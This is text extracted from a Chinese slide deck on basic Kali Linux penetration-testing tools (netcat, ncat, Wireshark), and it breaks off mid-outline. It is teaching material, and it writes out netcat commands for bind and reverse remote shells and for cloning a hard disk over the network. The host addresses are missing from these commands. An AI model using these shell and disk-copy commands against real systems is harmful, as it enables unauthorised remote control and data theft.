Kali linux渗透测试第五章 基本工具.pdf

Kali linux渗透测试 
 常⽤⼯具 • 经常使⽤且功能强⼤ • 安全从业者必不可少的帮⼿ • Nc / ncat • Wireshark • Tcpdump NETCAT ——NC • ⺴络⼯具中的瑞⼠军⼑——⼩⾝材、⼤智慧 • 侦听模式/ 传输模式 • telnet / 获取banner信息 • 传输⽂本信息 • 传输⽂件/ ⺫录 • 加密传输⽂件 • 远程控制/⽊⻢ • 加密所有流量 • 流媒体服务器 • 远程克隆硬盘 NC——TELNET / BANNER • nc –nv 110 • nc –nv 25 • nc –nv 80 NC——传输⽂本信息 • A ：nc -l -p 4444 • B ：nc –nv 4444 • 远程电⼦取证信息收集 NC——传输⽂件/ ⺫录 • 传输⽂件 • A ：nc -lp 333 1.mp4 • B ：nc -nv 333 1.mp4 –q 1 • 或 • A ：nc -q 1 -lp 333 a.mp4 • B ： nc -nv 333 2.mp4 • 传输⺫录 • A ：tar -cvf - music/ | nc -lp 333 –q 1 • B ：nc -nv 333 | tar -xvf – • 加密传⽂件 • A ：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb 1.mp4 • B ： mcrypt --flush -Fbq -a rijndael-256 -m ecb a.mp4 | nc -nv 333 -q 1 NC——流媒体服务 • A ：cat 1.mp4 | nc -lp 333 • B ： 333 | mplayer -vo x11 -cache 3000 - NC——端⼝扫描 • nc -nvz 1-65535 • nc –vnzu 1-1024 NC——远程克隆硬盘 • A ：nc -lp 333 | dd of=/dev/sda • B ：dd if=/dev/sda | nc -nv 333 –q 1 • 远程电⼦取证，可以将⺫标服务器硬盘远程复制，或者内存。 NC——远程控制 • 正向： • A ：nc -lp 333 -c bash • B ：nc 333 • 反向： • A ：nc -lp 333 • B ：nc 333 -c bash • 注：Windows⽤户把bash改成cmd ；
 NC——NCAT • Nc缺乏加密和⾝份验证的能⼒ • Ncat包含于nmap⼯具包中 • A ：ncat ncat -c bash --allow 4 -vnl 333 --ssl • B ：ncat -nv 333 --ssl WIRESHARK • 抓包嗅探协议分析 • 安全专家必备的技能 • 抓包引擎 • Libpcap9—— Linux • Winpcap10—— Windows • 解码能⼒ WIRESHARK——基本使⽤⽅法 • 启动 • 选择抓包⺴卡 • 混杂模式 • 实时抓包 • 保存和分析捕获⽂件 • ⾸选项 WIRESHARK——筛选器 • 过滤掉干扰的数据包 • 抓包筛选器 • 显⽰筛选器 WIRESHARK——常⻅协议包 • 数据包的分层结构 • Arp • Icmp • Tcp——三次握⼿ • Udp • Dns • http • ftp WIRESHARK——TCP • 数据流 •